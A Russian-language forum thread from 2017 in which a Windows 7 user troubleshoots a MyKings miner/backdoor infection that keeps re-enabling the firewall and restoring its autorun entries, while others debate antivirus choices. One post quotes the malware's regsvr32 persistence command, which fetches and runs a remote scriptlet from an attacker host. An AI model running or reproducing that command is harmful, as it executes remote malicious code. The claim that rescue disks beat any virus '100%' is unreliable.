Форум 3DNews
Вернуться   Форум 3DNews > Софт > Операционные системы Microsoft Windows

Ответ Создать новую тему
Опции темы Опции просмотра
Непрочитано 16.05.2017, 22:43   [включить плавающее окно]   #1
Antonych85
Мужской Общительный
Автор темы
 
Регистрация: 28.11.2014
Адрес: Сатка
Брандмауэр Windows 7 сам включается

Всем привет. На борту моего компьютера Windows 7 x64. Установлен антивирусник Avast Internet Security 2015, базы определения вирусов обновляются раз в 4 часа. Встроенный Брандмауэр Windows 7 отключил через панель управления/администрирование/службы, сразу после установки, т.к. в антивируснике есть свой фаерволл. Но с недавних пор этот Брандмауэр стал включаться сам по себе. Я его отключу, он опять включается. Как его прибить совсем, чтобы самопроизвольно не включался вновь?
Antonych85 вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 16.05.2017, 22:46   [включить плавающее окно]   #2
Zagadnik
Мужской Умудрённый
 
Аватар для Zagadnik
 
Регистрация: 12.11.2012
Адрес: Алтай
Отключить в настройках сетевого соединения.
Извиняюсь, ступил по старой памяти. Спать пора.

Последний раз редактировалось Zagadnik; 16.05.2017 в 22:55.
Zagadnik вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 17.05.2017, 12:50   [включить плавающее окно]   #3
Antonych85
Мужской Общительный
Автор темы
 
Регистрация: 28.11.2014
Адрес: Сатка
Понял причину:
В автозагрузке постоянно прописываются js.mykings 280. Т.е. действует какой-то троян. И это еще не самый опасный троян, по сравнению с вредоносным шифровальщиком WannaCry. Тем не менее, постоянно запускающийся Брандмауэр и эти две точки автозагрузки буду искать способ как-то вырубить. А может и переустановка винды.
Antonych85 вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 17.05.2017, 12:55   [включить плавающее окно]   #4
Lesnik75
Мужской Супер модератор
 
Регистрация: 08.02.2003
Адрес: Novosibirsk
Цитата (Antonych85) »
Установлен антивирусник Avast
Цитата (Antonych85) »
действует какой-то троян
И почему я не удивлен? ))
__________________
и тут пришел лесник ;)
Lesnik75 вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 17.05.2017, 13:28   [включить плавающее окно]   #5
Zagadnik
Мужской Умудрённый
 
Аватар для Zagadnik
 
Регистрация: 12.11.2012
Адрес: Алтай
Lesnik75
Ещё грустнее от того, что AVG теперь это тот же самый Avast...
Zagadnik вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 17.05.2017, 13:29   [включить плавающее окно]   #6
Smirnoff
Мужской Модератор
 
Аватар для Smirnoff
 
Регистрация: 30.12.2004
Адрес: Новосибирск
Цитата (Lesnik75) »
почему я не удивлен?
Я нисколько не удивлюсь, когда у него Avast заблокирует загрузку винды после (и именно из-за... ) удаления заразы - был уже в моей практике прецедент...


Добавлено через 6 минут

Цитата (Zagadnik) »
AVG теперь это тот же самый Avast...
Пару лет назад это ещё были два разных "продукта"; однако у клиентов единственное проявление "эффективности" заключалось в регулярном удалении файлика 1cestart.exe (лицензионного вусмерть, Ага ), а вот когда дирша открыла "документ" вида "бла-бла-бла..бла-бла-бла.doc.vbs" (шифровальщик, к тому моменту известный и детектируемый Dr.Web уже более шести месяцев, во! ) AVG даже не вякнул, пакость этакая...
__________________
С уважением,
Олег Р. Смирнов
Smirnoff вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 17.05.2017, 18:04   [включить плавающее окно]   #7
Antonych85
Мужской Общительный
Автор темы
 
Регистрация: 28.11.2014
Адрес: Сатка
Еще скажу, Avast с 4 по 9 мая отлавливал файлы item.dat и test[1].dat. а в планировщике появилось задание mysa. В автозагрузке - start и start1, ведущие по ссылке на js.mykings.280. отключаю их из автозагрузки но они вновь включаются.
Ни Доктор Веб Курейт, ни Аваст Интернет Секьюрити не обнаруживают хоть какую-то зацепку, при сканировании. AVZ тоже ничего не обнаружил.

Последний раз редактировалось Antonych85; 17.05.2017 в 18:06.
Antonych85 вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 17.05.2017, 18:08   [включить плавающее окно]   #8
zl0dey4eg
Мужской Недосягаемый
 
Аватар для zl0dey4eg
 
Регистрация: 24.12.2012
Адрес: Москва
Цитата (Antonych85) »
отключаю их из автозагрузки но они вновь включаются.
и так будет бесконечно, пока не ...
1. очистишь систему от говён из другой ОС (LiceCD DrWeb или Касперского)
2. не поставишь нормальный антивирь
zl0dey4eg вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 17.05.2017, 18:47   [включить плавающее окно]   #9
Antonych85
Мужской Общительный
Автор темы
 
Регистрация: 28.11.2014
Адрес: Сатка
Нормальный антивирь это какой еще? И Авиру пробовал - они банят периодически активацию (XP), и Касперский (w98) в середине нулевых стоял - тормозил систему, и Панда (XP), которую вообще посоветовали снести. и самый нормальный по состоянию на 2004 год был др Веб со спайдером (на Windows 98).
Antonych85 вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 17.05.2017, 20:10   [включить плавающее окно]   #10
zl0dey4eg
Мужской Недосягаемый
 
Аватар для zl0dey4eg
 
Регистрация: 24.12.2012
Адрес: Москва
Цитата (Antonych85) »
Нормальный антивирь это какой еще? И Авиру пробовал - они банят периодически активацию (XP), и Касперский (w98) в середине нулевых стоял - тормозил систему, и Панда (XP), которую вообще посоветовали снести. и самый нормальный по состоянию на 2004 год был др Веб со спайдером (на Windows 98).
Вас в поисковиках забанили?

Набираем - "топовый антивирус" и радуемся
zl0dey4eg вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 17.05.2017, 20:56   [включить плавающее окно]   #11
Antonych85
Мужской Общительный
Автор темы
 
Регистрация: 28.11.2014
Адрес: Сатка
Набрал - первый результат это Касперский, затем посмотрел рейтинги, первые места Каспер занимает. Как? С ним у меня 98-я винда грузилась 10 минут на Селероне 2400 с ОЗУ 256 мб. Без него 4 минуты. О_о.
Antonych85 вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 17.05.2017, 21:05   [включить плавающее окно]   #12
garniv
Мужской Модератор
 
Аватар для garniv
 
Регистрация: 29.06.2004
Antonych85
Вам скорость загрузки Винды важна или защищенность от большей части зловредов? Если первое - то сидите без антивируса, это самый быстрый вариант.
__________________
Хочешь помочь новичку — делай вместе с ним. Хочешь помочь старику — делай вместо него. Хочешь помочь мастеру — отойди и не мешай. А хочешь помочь Таргитаю — сам Таргитай.
garniv вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 17.05.2017, 21:11   [включить плавающее окно]   #13
zl0dey4eg
Мужской Недосягаемый
 
Аватар для zl0dey4eg
 
Регистрация: 24.12.2012
Адрес: Москва
Цитата (Antonych85) »
Набрал - первый результат это Касперский, затем посмотрел рейтинги, первые места Каспер занимает. Как? С ним у меня 98-я винда грузилась 10 минут на Селероне 2400 с ОЗУ 256 мб. Без него 4 минуты. О_о.
Вы до сих пор на селероне и на 98 винде?!?

Не хочу разрушать Ваш мирок, но ... сейчас 2017 год!!! В ходу 4х ядерные CPU, 8-16Гб оперативки и очень быстрые SSD.

PS: чуть не забыл, сменилось уже 7 поколений Windows!!!

PPS: и linux стал вполне себе user friendly, и его можно без антивируса юзать

Последний раз редактировалось zl0dey4eg; 17.05.2017 в 21:13.
zl0dey4eg вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 19.05.2017, 00:21   [включить плавающее окно]   #14
Antonych85
Мужской Общительный
Автор темы
 
Регистрация: 28.11.2014
Адрес: Сатка
Да не. У меня сейчас 2500К, и 8 гиг оперативки, и Винда 7 64 бита. Конечно сменить не мешало бы, но кризис этот... Железки в цене выросли. Сейчас выяснилось вот что, в планировщике Mysa. item.dat снес, но regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll прописался в автозагрузке в виде трех прог косящих под проги винды, походу всерьез, причем эти майнер и бэкдор, говорят, вновь появляются на свежеустановленной системе, даже формат С не помогает.
Прибивать автозагрузку бесполезно, активируются вновь, а вот снесеный item.dat не появляется больше.
Попробую MALWAREBYTES прогнать, антивирусы ничего не находят - молчат, даже др.Веб курейт, который самый нормальный был.

Добавлено через 2 минуты

Цитата (garniv) »
Antonych85
Вам скорость загрузки Винды важна или защищенность от большей части зловредов? Если первое - то сидите без антивируса, это самый быстрый вариант.
Мой знакомый вообще без какого-либо антивируса сидит, но не скидывает и не хранит ничего важного на том компе, зато игрушки и система ууух летают... Все ненужные порты он просто закрыл командной строкой - программист по призванию. Но я все же считаю, что антивирь должен быть, все равно какая-никакая защита, хотя бы от старых вирусов.

Последний раз редактировалось Antonych85; 19.05.2017 в 01:42.
Antonych85 вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 23.05.2017, 19:40   [включить плавающее окно]   #15
ladir
Мужской Общительный
 
Регистрация: 09.04.2010
Адрес: Москва
Ваш вопрос схож с моей проблемой.
Только у меня ОС WinXP.

Получилось ли у Вас победить данный зловред и каким образом?
ladir вне форума  
Ответить с цитированием
Непрочитано 24.05.2017, 23:05   [включить плавающее окно]   #16
zl0dey4eg
Мужской Недосягаемый
 
Аватар для zl0dey4eg
 
Регистрация: 24.12.2012
Адрес: Москва
Цитата (ladir) »
Получилось ли у Вас победить данный зловред и каким образом?
Есть два 100% способа победить любой (кроме шифровальщика) вирус.

1. Kaspersky Rescue Disk (Free)
2. Dr.Web LiveDisk (free)

__________________
____ ¯\_(ツ)_/¯ ____ поддержка отечественного производителя ...
zl0dey4eg вне форума  
Конфигурация ПК
Ответить с цитированием
Непрочитано 25.05.2017, 19:18   [включить плавающее окно]   #17
ladir
Мужской Общительный
 
Регистрация: 09.04.2010
Адрес: Москва
Уточните каким образом у Вас проявлялась активность данного вируса.
ladir вне форума  
Ответить с цитированием
Ответ Создать новую тему

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Текущее время: 16:47. Часовой пояс GMT +3.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot
Copyright © 2000-2017 3DNews. All Rights Reserved.
Администрация 3DNews требует соблюдения на форуме правил и законов РФ
Серверы размещены в Hostkey